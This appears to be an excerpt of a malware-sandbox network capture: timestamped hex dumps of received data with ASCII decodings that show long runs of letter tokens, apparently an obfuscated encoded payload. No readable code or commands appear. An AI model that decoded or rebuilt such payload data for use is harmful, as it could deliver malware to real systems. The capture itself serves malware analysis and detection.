                Data Ascii: I cx px qqp qhp Ix qhe eh cI eI qOh px qqx qew qhq pp qpw xp ch Ih qew qeh p eej qqe ch ce ec eqc pp pO qcw qqq qqx wj qjO ch cx ph eO qcp qhp qqe cI jp jh ch qqx px qwq OO qj qjc xp ch ch qew qjj qec IO ech ch xp cI ejx pI O ejj qhO qqe cx ep e ce xw qOe
                2021-10-27 01:03:08 UTC143INData Raw: 71 71 65 20 63 65 20 4f 63 20 63 77 20 63 78 20 70 78 20 71 71 49 20 4f 6a 20 71 78 78 20 71 71 6a 20 63 68 20 63 70 20 65 78 20 63 78 20 70 78 20 71 71 78 20 63 4f 20 71 65 6a 20 70 70 20 71 70 68 20 78 70 20 63 68 20 78 70 20 78 65 20 49 4f 20 71 71 77 20 71 68 4f 20 71 71 49 20 6a 68 20 63 6a 20 65 49 20 71 78 68 20 70 78 20 71 71 78 20 71 71 63 20 77 71 20 71 71 63 20 65 20 63 70 20 63 68 20 6a 63 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 70 20 78 65 20 49 49 20 4f 78 20 71 65 68 20 77 63 20 71 68 65 20 4f 6a 20 65 68 49 20 63 71 20 63 78 20 4f 78 20 4f 68 20 78 6a 20 71 68 4f 20 71 71 65 20 63 65 20 65 49 20 65 68 20 65 4f 20 71 49 63 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 4f 49 20 63 68 20 78 70 20 63 68 20
                Data Ascii: qqe ce Oc cw cx px qqI Oj qxx qqj ch cp ex cx px qqx cO qej pp qph xp ch xp xe IO qqw qhO qqI jh cj eI qxh px qqx qqc wq qqc e cp ch jc px qqx qqw qhO qqe ch xp xp xe II Ox qeh wc qhe Oj ehI cq cx Ox Oh xj qhO qqe ce eI eh eO qIc qqx qqw qhO qOI ch xp ch
                2021-10-27 01:03:08 UTC147INData Raw: 63 20 71 77 20 78 77 20 49 4f 20 65 71 78 20 49 65 20 71 77 4f 20 65 63 68 20 71 71 49 20 71 20 65 65 4f 20 71 77 49 20 71 77 65 20 4f 63 20 71 63 4f 20 63 63 20 68 20 4f 65 20 71 71 65 20 71 78 70 20 49 49 20 71 6a 78 20 78 68 20 78 6a 20 4f 71 20 65 63 6a 20 65 6a 20 4f 68 20 65 68 4f 20 77 77 20 71 65 49 20 71 78 71 20 71 78 4f 20 6a 65 20 4f 68 20 65 65 68 20 65 63 63 20 71 78 6a 20 63 4f 20 65 78 4f 20 77 49 20 49 77 20 6a 65 20 6a 49 20 63 4f 20 65 71 68 20 65 71 71 20 63 4f 20 65 78 70 20 71 6a 4f 20 71 65 70 20 71 4f 78 20 65 6a 77 20 65 63 68 20 71 6a 6a 20 78 78 20 71 68 68 20 71 6a 49 20 65 65 68 20 63 20 65 20 65 63 63 20 77 70 20 70 65 20 71 65 77 20 71 70 68 20 70 20 71 65 65 20 77 71 20 68 20 65 68 49 20 65 6a 20 65 20 4f 78 20 71 63 71 20
                Data Ascii: c qw xw IO eqx Ie qwO ech qqI q eeO qwI qwe Oc qcO cc h Oe qqe qxp II qjx xh xj Oq ecj ej Oh ehO ww qeI qxq qxO je Oh eeh ecc qxj cO exO wI Iw je jI cO eqh eqq cO exp qjO qep qOx ejw ech qjj xx qhh qjI eeh c e ecc wp pe qew qph p qee wq h ehI ej e Ox qcq
                2021-10-27 01:03:08 UTC150INData Raw: 49 6a 20 65 71 68 20 65 71 71 20 71 77 6a 20 65 78 63 20 70 49 20 49 68 20 6a 71 20 6a 70 20 77 65 20 71 68 49 20 65 70 20 65 65 71 20 71 65 6a 20 65 6a 77 20 6a 4f 20 78 70 20 71 49 6a 20 65 71 65 20 65 63 65 20 77 71 20 71 71 71 20 49 49 20 71 65 68 20 71 6a 77 20 65 78 77 20 71 65 63 20 4f 70 20 63 63 20 71 4f 20 65 4f 20 6a 20 71 78 65 20 77 20 65 20 4f 70 20 71 63 77 20 70 4f 20 71 49 20 4f 4f 20 71 70 49 20 71 68 78 20 71 65 70 20 6a 65 20 70 78 20 78 63 20 6a 4f 20 65 68 77 20 71 78 63 20 63 4f 20 65 78 65 20 65 65 49 20 65 65 65 20 77 77 20 6a 77 20 71 68 77 20 71 77 68 20 71 6a 6a 20 4f 65 20 77 70 20 78 77 20 71 70 4f 20 71 77 20 71 6a 4f 20 63 49 20 71 68 20 65 77 20 71 77 6a 20 65 78 77 20 71 71 49 20 6a 68 20 65 68 63 20 65 71 78 20 78 6a 20
                Data Ascii: Ij eqh eqq qwj exc pI Ih jq jp we qhI ep eeq qej ejw jO xp qIj eqe ece wq qqq II qeh qjw exw qec Op cc qO eO j qxe w e Op qcw pO qI OO qpI qhx qep je px xc jO ehw qxc cO exe eeI eee ww jw qhw qwh qjj Oe wp xw qpO qw qjO cI qh ew qwj exw qqI jh ehc eqx xj
                2021-10-27 01:03:08 UTC155INData Raw: 6a 63 20 4f 49 20 70 71 20 65 78 20 71 6a 6a 20 77 78 20 6a 63 20 65 63 20 71 63 71 20 65 63 71 20 65 71 68 20 77 20 65 65 63 20 71 71 6a 20 71 78 71 20 71 78 4f 20 65 63 71 20 71 4f 4f 20 78 68 20 71 77 78 20 71 68 68 20 65 71 4f 20 78 70 20 71 63 70 20 78 70 20 71 68 49 20 71 71 71 20 71 71 78 20 71 70 20 71 68 68 20 71 63 65 20 6a 70 20 71 49 65 20 70 63 20 71 65 65 20 78 4f 20 71 49 70 20 65 71 6a 20 71 68 77 20 63 71 20 71 70 63 20 71 4f 6a 20 63 63 20 71 63 49 20 65 78 49 20 71 78 68 20 71 68 4f 20 68 20 65 6a 49 20 4f 20 71 78 68 20 71 49 20 65 71 20 65 68 63 20 65 71 78 20 71 68 20 78 70 20 65 71 70 20 71 63 6a 20 65 63 65 20 6a 4f 20 71 65 49 20 71 4f 68 20 71 65 49 20 71 49 71 20 71 4f 68 20 4f 65 20 71 4f 78 20 65 68 70 20 65 71 70 20 71 68 6a
                Data Ascii: jc OI pq ex qjj wx jc ec qcq ecq eqh w eec qqj qxq qxO ecq qOO xh qwx qhh eqO xp qcp xp qhI qqq qqx qp qhh qce jp qIe pc qee xO qIp eqj qhw cq qpc qOj cc qcI exI qxh qhO h ejI O qxh qI eq ehc eqx qh xp eqp qcj ece jO qeI qOh qeI qIq qOh Oe qOx ehp eqp qhj
                2021-10-27 01:03:08 UTC158INData Raw: 70 77 20 77 71 20 71 49 68 20 71 65 63 20 71 70 63 20 65 6a 4f 20 68 20 65 71 68 20 78 70 20 71 77 6a 20 71 65 6a 20 71 77 6a 20 65 68 78 20 71 71 77 20 71 6a 70 20 70 70 20 65 65 4f 20 71 70 6a 20 71 49 6a 20 71 6a 68 20 71 65 6a 20 71 77 77 20 71 4f 20 71 6a 78 20 71 71 6a 20 71 65 77 20 78 70 20 65 68 77 20 71 78 63 20 71 77 20 71 63 63 20 6a 77 20 71 49 78 20 71 78 6a 20 70 20 71 77 70 20 78 4f 20 65 78 71 20 77 49 20 70 4f 20 71 68 77 20 71 63 77 20 71 63 70 20 70 6a 20 65 78 70 20 68 20 71 49 78 20 4f 68 20 63 65 20 65 4f 20 6a 6a 20 78 63 20 77 20 71 78 4f 20 71 68 63 20 71 49 65 20 71 63 4f 20 70 71 20 70 70 20 4f 4f 20 71 49 77 20 71 77 70 20 49 65 20 78 63 20 71 78 71 20 71 78 77 20 4f 6a 20 71 70 4f 20 71 71 63 20 71 71 49 20 65 78 4f 20 71 49
                Data Ascii: pw wq qIh qec qpc ejO h eqh xp qwj qej qwj ehx qqw qjp pp eeO qpj qIj qjh qej qww qO qjx qqj qew xp ehw qxc qw qcc jw qIx qxj p qwp xO exq wI pO qhw qcw qcp pj exp h qIx Oh ce eO jj xc w qxO qhc qIe qcO pq pp OO qIw qwp Ie xc qxq qxw Oj qpO qqc qqI exO qI
                2021-10-27 01:03:08 UTC163INData Raw: 70 78 20 65 78 4f 20 71 65 78 20 63 65 20 71 71 65 20 63 65 20 78 70 20 71 77 78 20 49 6a 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 71 4f 65 20 63 4f 20 65 65 78 20 63 4f 20 78 70 20 70 78 20 71 6a 68 20 71 65 78 20 71 70 4f 20 71 65 71 20 63 65 20 78 70 20 63 77 20 49 68 20 71 6a 65 20 71 65 6a 20 71 71 63 20 71 68 4f 20 70 4f 20 63 49 20 65 65 78 20 63 4f 20 78 70 20 70 78 20 77 78 20 71 65 77 20 71 70 4f 20 71 65 71 20 63 65 20 78 70 20 4f 70 20 49 68 20 78 70 20 71 65 68 20 71 71 63 20 71 68 4f 20 65 78 6a 20 63 49 20 70 78 20 63 49 20 78 70 20 70 78 20 65 65 77 20 71 65 77 20 4f 20 71 65 65 20 63 65 20 78 70 20 71 77 71 20 49 68 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 65 65 71 20 63 49 20 71 68 63 20 63 68 20 78 70 20 70 78 20 65 68 63
                Data Ascii: px exO qex ce qqe ce xp qwx Ij qj qqx qqc qhO qOe cO eex cO xp px qjh qex qpO qeq ce xp cw Ih qje qej qqc qhO pO cI eex cO xp px wx qew qpO qeq ce xp Op Ih xp qeh qqc qhO exj cI px cI xp px eew qew O qee ce xp qwq Ih qj qqx qqc qhO eeq cI qhc ch xp px ehc
                2021-10-27 01:03:08 UTC166INData Raw: 78 20 70 63 20 71 65 6a 20 71 71 65 20 63 68 20 65 78 4f 20 63 71 20 71 70 68 20 70 78 20 6a 4f 20 71 71 49 20 71 68 68 20 71 71 6a 20 63 68 20 78 70 20 71 78 20 6a 65 20 70 78 20 71 71 78 20 71 65 78 20 71 71 68 20 65 78 65 20 63 68 20 71 68 4f 20 63 71 20 63 78 20 70 63 20 4f 70 20 71 71 77 20 63 6a 20 71 68 65 20 63 68 20 78 70 20 65 63 71 20 63 63 20 65 71 68 20 71 71 78 20 78 68 20 71 68 70 20 71 65 71 20 63 71 20 78 70 20 63 68 20 71 4f 68 20 49 49 20 71 71 78 20 71 71 77 20 71 68 68 20 71 71 63 20 71 70 71 20 78 70 20 70 71 20 63 63 20 70 63 20 71 71 63 20 71 71 77 20 71 68 4f 20 65 68 68 20 6a 49 20 78 70 20 63 68 20 65 63 63 20 70 63 20 65 63 71 20 71 71 77 20 71 78 20 71 71 6a 20 63 71 20 78 4f 20 63 68 20 63 78 20 71 65 70 20 71 68 68 20 71 71
                Data Ascii: x pc qej qqe ch exO cq qph px jO qqI qhh qqj ch xp qx je px qqx qex qqh exe ch qhO cq cx pc Op qqw cj qhe ch xp ecq cc eqh qqx xh qhp qeq cq xp ch qOh II qqx qqw qhh qqc qpq xp pq cc pc qqc qqw qhO ehh jI xp ch ecc pc ecq qqw qx qqj cq xO ch cx qep qhh qq
                2021-10-27 01:03:08 UTC171INData Raw: 65 20 71 63 71 20 63 71 20 70 63 20 71 71 78 20 65 71 6a 20 65 6a 63 20 65 71 70 20 63 63 20 78 4f 20 63 68 20 65 6a 68 20 65 71 68 20 65 65 71 20 71 71 65 20 71 68 70 20 71 71 65 20 63 68 20 71 70 6a 20 71 63 65 20 63 78 20 70 63 20 71 71 78 20 71 68 63 20 65 6a 78 20 65 78 77 20 63 71 20 78 4f 20 63 68 20 71 78 20 65 71 71 20 65 78 63 20 71 71 49 20 71 68 70 20 71 71 65 20 71 68 65 20 71 70 6a 20 71 63 65 20 63 78 20 70 63 20 71 71 78 20 65 78 71 20 65 6a 78 20 65 78 77 20 63 71 20 78 4f 20 63 68 20 71 6a 68 20 65 71 71 20 65 78 63 20 71 71 49 20 71 68 70 20 71 71 65 20 65 71 78 20 71 70 6a 20 71 70 71 20 63 63 20 70 63 20 71 71 78 20 4f 77 20 65 65 4f 20 71 4f 49 20 63 63 20 78 4f 20 63 68 20 49 20 65 65 68 20 65 68 65 20 71 71 65 20 71 68 70 20 71 71
                Data Ascii: e qcq cq pc qqx eqj ejc eqp cc xO ch ejh eqh eeq qqe qhp qqe ch qpj qce cx pc qqx qhc ejx exw cq xO ch qx eqq exc qqI qhp qqe qhe qpj qce cx pc qqx exq ejx exw cq xO ch qjh eqq exc qqI qhp qqe eqx qpj qpq cc pc qqx Ow eeO qOI cc xO ch I eeh ehe qqe qhp qq
                2021-10-27 01:03:08 UTC175INData Raw: 78 20 70 78 20 71 71 78 20 71 71 77 20 71 71 20 71 71 63 20 71 63 63 20 65 6a 20 71 71 65 20 63 63 20 71 65 49 20 71 71 78 20 65 78 4f 20 49 49 20 71 71 65 20 63 68 20 78 70 20 63 68 20 70 68 20 70 77 20 71 65 68 20 4f 6a 20 71 68 78 20 71 71 6a 20 6a 71 20 78 70 20 71 63 78 20 65 63 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 65 65 20 78 4f 20 6a 20 65 49 20 70 71 20 70 78 20 4f 65 20 71 71 77 20 65 65 71 20 4f 63 20 63 68 20 78 70 20 63 68 20 63 78 20 49 4f 20 71 68 49 20 71 65 63 20 71 71 4f 20 63 65 20 63 68 20 6a 68 20 63 68 20 71 71 68 20 71 68 68 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 49 20 78 70 20 65 20 6a 71 20 78 20 71 71 63 20 4f 71 20 71 68 4f 20 65 68 68 20 65 20 78 70 20 63 68 20 63 78 20 70 78 20 71 68 68 20 71 71 77 20
                Data Ascii: x px qqx qqw qq qqc qcc ej qqe cc qeI qqx exO II qqe ch xp ch ph pw qeh Oj qhx qqj jq xp qcx ec px qqx qqw qhO ee xO j eI pq px Oe qqw eeq Oc ch xp ch cx IO qhI qec qqO ce ch jh ch qqh qhh qqx qqw qhO qqe jI xp e jq x qqc Oq qhO ehh e xp ch cx px qhh qqw
                2021-10-27 01:03:08 UTC178INData Raw: 20 71 68 78 20 4f 4f 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 65 78 20 71 71 65 20 71 70 77 20 71 71 6a 20 71 77 49 20 63 65 20 63 78 20 71 71 78 20 71 6a 6a 20 49 68 20 71 71 65 20 63 68 20 78 70 20 63 68 20 6a 4f 20 70 78 20 71 6a 71 20 63 65 20 65 6a 4f 20 71 71 78 20 70 49 20 78 70 20 71 70 49 20 71 68 68 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 4f 77 20 63 68 20 71 68 63 20 71 71 65 20 71 4f 68 20 70 49 20 65 68 20 71 71 77 20 65 68 4f 20 6a 78 20 63 68 20 78 70 20 63 68 20 63 78 20 49 4f 20 71 71 78 20 71 70 68 20 78 77 20 65 65 78 20 78 70 20 70 70 20 63 68 20 4f 68 20 77 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 63 20 78 70 20 49 6a 20 71 71 77 20 71 49 20 71 71 78 20 65 70 20 71 68 4f 20 71 68 78 20 71 68 65 20 78 70 20
                Data Ascii: qhx OO cx px qqx qqw qex qqe qpw qqj qwI ce cx qqx qjj Ih qqe ch xp ch jO px qjq ce ejO qqx pI xp qpI qhh px qqx qqw qhO Ow ch qhc qqe qOh pI eh qqw ehO jx ch xp ch cx IO qqx qph xw eex xp pp ch Oh w qqx qqw qhO qqe jc xp Ij qqw qI qqx ep qhO qhx qhe xp
                2021-10-27 01:03:08 UTC183INData Raw: 63 65 20 77 70 20 71 71 4f 20 71 63 70 20 71 71 65 20 71 6a 70 20 49 49 20 63 68 20 63 78 20 4f 65 20 71 71 78 20 65 65 70 20 71 68 4f 20 65 71 6a 20 70 65 20 71 65 20 78 70 20 71 4f 77 20 70 78 20 77 68 20 49 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 71 49 6a 20 63 78 20 71 65 4f 20 71 70 20 71 6a 63 20 71 71 68 20 71 6a 71 20 63 68 20 4f 49 20 49 63 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 65 6a 63 20 71 68 78 20 71 4f 6a 20 78 65 20 70 63 20 63 78 20 71 49 68 20 71 71 78 20 65 63 20 6a 68 20 71 71 65 20 63 68 20 63 49 20 63 68 20 71 49 63 20 70 78 20 77 71 20 65 68 20 71 78 70 20 71 71 63 20 71 4f 70 20 78 70 20 65 71 68 20 49 4f 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 65 78 49 20 78 65 20 71 4f 63 20 78 68 20 70 71 20 70 78 20 71 6a 78
                Data Ascii: ce wp qqO qcp qqe qjp II ch cx Oe qqx eep qhO eqj pe qe xp qOw px wh I qhO qqe ch xp qIj cx qeO qp qjc qqh qjq ch OI Ic cx px qqx qqw ejc qhx qOj xe pc cx qIh qqx ec jh qqe ch cI ch qIc px wq eh qxp qqc qOp xp eqh IO px qqx qqw qhO exI xe qOc xh pq px qjx
                2021-10-27 01:03:08 UTC187INData Raw: 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 49 20 78 70 20 4f 63 20 77 49 20 71 68 78 20 71 71 65 20 49 70 20 71 68 70 20 77 65 20 71 78 63 20 78 70 20 63 68 20 63 78 20 70 78 20 71 68 68 20 71 71 77 20 65 65 68 20 71 68 20 71 78 20 63 68 20 6a 20 63 63 20 78 70 20 65 68 4f 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 6a 70 20 63 68 20 71 4f 63 20 78 49 20 77 70 20 71 71 4f 20 4f 65 20 71 71 6a 20 71 49 65 20 71 78 77 20 63 68 20 63 78 20 70 78 20 71 71 78 20 4f 4f 20 71 68 4f 20 77 6a 20 77 6a 20 71 65 20 78 70 20 77 20 70 63 20 65 68 49 20 65 71 78 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 6a 49 20 63 78 20 78 71 20 4f 20 71 78 68 20 71 71 68 20 49 63 20 63 71 20 65 71 49 20 71 78 63 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 65 6a 20 71 71
                Data Ascii: x qqw qhO qqe jI xp Oc wI qhx qqe Ip qhp we qxc xp ch cx px qhh qqw eeh qh qx ch j cc xp ehO qqw qhO qqe ch jp ch qOc xI wp qqO Oe qqj qIe qxw ch cx px qqx OO qhO wj wj qe xp w pc ehI eqx qhO qqe ch xp jI cx xq O qxh qqh Ic cq eqI qxc cx px qqx qqw qej qq
                2021-10-27 01:03:08 UTC191INData Raw: 78 20 6a 71 20 63 63 20 63 6a 20 71 71 63 20 78 71 20 65 71 77 20 71 71 65 20 63 68 20 78 70 20 63 68 20 78 70 20 70 78 20 71 63 70 20 65 65 63 20 4f 65 20 71 71 70 20 70 68 20 78 4f 20 77 78 20 71 6a 68 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 70 20 63 68 20 78 78 20 71 49 77 20 71 78 20 70 65 20 71 49 20 71 71 49 20 65 78 4f 20 71 4f 49 20 63 68 20 78 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 4f 20 65 78 70 20 65 6a 20 63 68 20 70 6a 20 63 71 20 71 63 78 20 65 65 63 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 65 20 78 70 20 71 70 65 20 71 49 6a 20 71 71 63 20 71 71 63 20 65 65 20 71 68 70 20 68 20 71 6a 65 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 63 20 71 71 77 20 71 70 71 20 65 65 4f 20 65 71 20 78 4f 20 70 77 20 63 63
                Data Ascii: x jq cc cj qqc xq eqw qqe ch xp ch xp px qcp eec Oe qqp ph xO wx qjh px qqx qqw qhO qqp ch xx qIw qx pe qI qqI exO qOI ch xp ch cx pc qqx eO exp ej ch pj cq qcx eec qqx qqw qhO qqe ce xp qpe qIj qqc qqc ee qhp h qje xp ch cx px qqc qqw qpq eeO eq xO pw cc
                2021-10-27 01:03:08 UTC195INData Raw: 20 71 77 68 20 65 77 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 78 71 20 77 68 20 71 71 65 20 63 68 20 63 68 20 63 68 20 6a 78 20 71 65 68 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 65 20 65 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 4f 20 49 63 20 71 71 65 20 63 68 20 63 68 20 63 68 20 71 77 78 20 71 65 68 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 71 6a 78 20 65 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 6a 20 49 78 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 6a 78 20 71 65 71 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 63 78 20 6a 68 20 63 68 20 63 78 20 70 63 20 71 71 78 20 78 63 20 49 77 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 65 63 78 20 71 65 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 65 71 78 20 6a 68
                Data Ascii: qwh ew ch cx pc qqx qxq wh qqe ch ch ch jx qeh qqx qqw qqh qqe e ep ch cx pc qqx O Ic qqe ch ch ch qwx qeh qqx qqw qqh qqe qjx ep ch cx pc qqx qj Ix qqe ch xO ch qjx qeq qqx qqw qhp qqe cx jh ch cx pc qqx xc Iw qqe ch xO ch ecx qee qqx qqw qhp qqe eqx jh
                2021-10-27 01:03:08 UTC199INData Raw: 71 71 65 20 65 6a 63 20 4f 68 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 78 68 20 49 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 65 6a 71 20 49 6a 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 63 71 20 4f 65 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 70 68 20 71 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 71 20 63 77 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 71 68 77 20 4f 6a 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 68 70 20 68 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 65 6a 20 63 70 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 4f 63 20 4f 78 20 63 68 20 63 78 20 70 49 20 71 71 78 20 65 63 65 20 6a 20 71 71 65 20 63 68 20 63 71 20 63 68 20 71 78 77 20 63 70 20 71 71 78 20 71 71 77 20 71 68 63 20 71 71 65 20 65 78 6a 20 4f 78 20
                Data Ascii: qqe ejc Oh ch cx pc qqx exh I qqe ch xO ch ejq Ij qqx qqw qqq qqe cq Oe ch cx pc qqx qph q qqe ch xO ch qq cw qqx qqw qqq qqe qhw Oj ch cx pc qqx ehp h qqe ch xO ch ej cp qqx qqw qhp qqe Oc Ox ch cx pI qqx ece j qqe ch cq ch qxw cp qqx qqw qhc qqe exj Ox
                2021-10-27 01:03:08 UTC203INData Raw: 63 49 20 63 78 20 65 63 20 71 71 78 20 71 65 6a 20 71 68 4f 20 6a 77 20 63 68 20 6a 49 20 63 68 20 71 68 77 20 70 78 20 70 68 20 71 71 77 20 49 68 20 71 71 65 20 65 63 20 78 70 20 70 6a 20 63 78 20 71 65 71 20 71 71 78 20 78 78 20 71 68 4f 20 77 68 20 63 68 20 71 65 71 20 63 68 20 65 63 63 20 70 71 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 71 6a 71 20 78 4f 20 71 4f 6a 20 78 78 20 63 71 20 71 71 78 20 71 65 20 71 68 70 20 71 6a 71 20 78 68 20 71 68 77 20 63 6a 20 71 77 63 20 70 78 20 65 65 77 20 70 78 20 71 6a 77 20 71 71 65 20 71 77 71 20 78 70 20 71 77 6a 20 65 6a 20 71 77 49 20 71 71 78 20 65 6a 49 20 71 68 4f 20 71 4f 78 20 71 4f 20 65 71 77 20 63 68 20 71 63 4f 20 70 78 20 78 4f 20 70 65 20 70 78 20 71 71 6a 20 71 63 63 20 78 70 20 4f 4f 20 71
                Data Ascii: cI cx ec qqx qej qhO jw ch jI ch qhw px ph qqw Ih qqe ec xp pj cx qeq qqx xx qhO wh ch qeq ch ecc pq qeO qqq qh qqe qjq xO qOj xx cq qqx qe qhp qjq xh qhw cj qwc px eew px qjw qqe qwq xp qwj ej qwI qqx ejI qhO qOx qO eqw ch qcO px xO pe px qqj qcc xp OO q
                2021-10-27 01:03:08 UTC207INData Raw: 71 20 71 71 78 20 65 71 65 20 71 71 71 20 71 78 71 20 71 63 6a 20 71 49 68 20 78 70 20 71 63 71 20 70 49 20 77 71 20 65 71 77 20 71 63 68 20 71 65 78 20 65 71 4f 20 63 68 20 71 65 20 71 63 78 20 65 78 70 20 71 71 65 20 63 77 20 71 68 4f 20 78 65 20 71 63 70 20 49 65 20 63 49 20 65 71 63 20 70 49 20 71 65 4f 20 71 71 71 20 78 20 71 71 70 20 71 77 4f 20 63 68 20 71 4f 6a 20 78 78 20 71 68 4f 20 71 71 70 20 65 78 78 20 71 71 71 20 71 70 20 71 63 70 20 71 77 65 20 63 68 20 71 70 6a 20 70 49 20 6a 68 20 65 71 77 20 6a 4f 20 71 71 49 20 71 6a 71 20 63 71 20 49 70 20 71 63 78 20 77 65 20 71 65 77 20 71 63 49 20 71 68 4f 20 65 63 71 20 71 63 70 20 71 70 20 49 6a 20 77 71 20 70 49 20 65 65 49 20 65 71 77 20 71 4f 70 20 71 71 63 20 49 77 20 63 68 20 71 49 77 20 71
                Data Ascii: q qqx eqe qqq qxq qcj qIh xp qcq pI wq eqw qch qex eqO ch qe qcx exp qqe cw qhO xe qcp Ie cI eqc pI qeO qqq x qqp qwO ch qOj xx qhO qqp exx qqq qp qcp qwe ch qpj pI jh eqw jO qqI qjq cq Ip qcx we qew qcI qhO ecq qcp qp Ij wq pI eeI eqw qOp qqc Iw ch qIw q
                2021-10-27 01:03:08 UTC210INData Raw: 6a 20 78 78 20 65 78 71 20 4f 4f 20 71 78 68 20 71 71 71 20 71 65 4f 20 71 63 65 20 63 63 20 63 78 20 4f 63 20 70 71 20 65 68 20 65 71 49 20 71 4f 70 20 4f 77 20 70 6a 20 63 68 20 65 71 70 20 78 65 20 65 6a 71 20 4f 4f 20 78 78 20 71 68 78 20 65 77 20 71 6a 68 20 71 63 49 20 78 70 20 71 6a 63 20 70 49 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 65 68 6a 20 63 68 20 49 78 20 71 6a 78 20 65 68 68 20 71 71 78 20 71 78 68 20 71 71 71 20 71 78 65 20 71 63 65 20 71 4f 77 20 63 49 20 65 71 63 20 70 78 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 63 4f 20 78 4f 20 77 6a 20 71 6a 78 20 71 71 70 20 71 65 77 20 4f 20 71 68 4f 20 49 68 20 71 63 63 20 71 71 78 20 63 77 20 71 71 4f 20 70 49 20 65 6a 71 20 65 71 77 20 4f 77 20 4f 70 20 71 63 63 20 63 71 20 71 4f
                Data Ascii: j xx exq OO qxh qqq qeO qce cc cx Oc pq eh eqI qOp Ow pj ch eqp xe ejq OO xx qhx ew qjh qcI xp qjc pI qeO qqq qh qqe ehj ch Ix qjx ehh qqx qxh qqq qxe qce qOw cI eqc px qeO qqq qh qqe cO xO wj qjx qqp qew O qhO Ih qcc qqx cw qqO pI ejq eqw Ow Op qcc cq qO
                2021-10-27 01:03:08 UTC226INData Raw: 71 20 49 70 20 70 77 20 63 78 20 65 71 20 71 20 49 20 70 20 65 4f 20 70 68 20 4f 65 20 77 63 20 71 71 78 20 78 4f 20 71 20 65 65 20 6a 71 20 65 63 20 49 49 20 49 70 20 4f 71 20 70 4f 20 63 70 20 63 71 20 71 20 65 63 20 65 20 4f 71 20 70 65 20 77 71 20 49 49 20 78 4f 20 71 71 78 20 63 65 20 6a 68 20 6a 20 70 77 20 4f 6a 20 70 68 20 4f 68 20 78 63 20 63 65 20 65 70 20 71 20 65 71 20 71 68 68 20 70 63 20 49 78 20 49 4f 20 49 71 20 65 4f 20 65 77 20 78 78 20 78 20 77 68 20 49 49 20 4f 71 20 70 78 20 6a 6a 20 49 20 71 49 20 71 68 4f 20 78 4f 20 49 63 20 49 77 20 70 77 20 4f 71 20 63 78 20 6a 68 20 71 65 20 6a 63 20 71 77 20 4f 63 20 70 63 20 63 68 20 71 71 4f 20 6a 4f 20 71 20 71 49 20 68 20 71 70 20 4f 78 20 77 6a 20 4f 70 20 49 70 20 63 4f 20 65 65 20 68 20
                Data Ascii: q Ip pw cx eq q I p eO ph Oe wc qqx xO q ee jq ec II Ip Oq pO cp cq q ec e Oq pe wq II xO qqx ce jh j pw Oj ph Oh xc ce ep q eq qhh pc Ix IO Iq eO ew xx x wh II Oq px jj I qI qhO xO Ic Iw pw Oq cx jh qe jc qw Oc pc ch qqO jO q qI h qp Ox wj Op Ip cO ee h
                2021-10-27 01:03:08 UTC242INData Raw: 4f 20 63 65 20 49 71 20 78 78 20 49 49 20 70 71 20 70 65 20 49 4f 20 77 49 20 63 49 20 65 71 20 49 77 20 63 65 20 63 65 20 71 68 77 20 70 70 20 49 4f 20 71 65 65 20 49 6a 20 78 65 20 63 78 20 6a 4f 20 63 63 20 70 63 20 71 65 71 20 4f 68 20 4f 68 20 63 49 20 78 68 20 63 78 20 78 65 20 65 4f 20 70 71 20 78 20 49 49 20 71 68 68 20 65 6a 20 77 78 20 77 20 6a 49 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 78 4f 20 65 49 20 78 70 20 65 4f 20 63 71 20 77 71 20 4f 49 20 71 65 6a 20 77 70 20 71 78 20 6a 65 20 65 6a 20 6a 77 20 71 4f 20 77 65 20 4f 65 20 77 68 20 71 70 20 78 70 20 63 71 20 6a 78 20 78 20 49 70 20 77 63 20 71 68 6a 20 4f 71 20 71 63 20 63 4f 20 49 77 20 78 65 20 6a 20 6a 71 20 4f 77 20 77 68 20 77 71 20 70 4f 20 71 71 65 20 6a 77 20 71 63 20 65
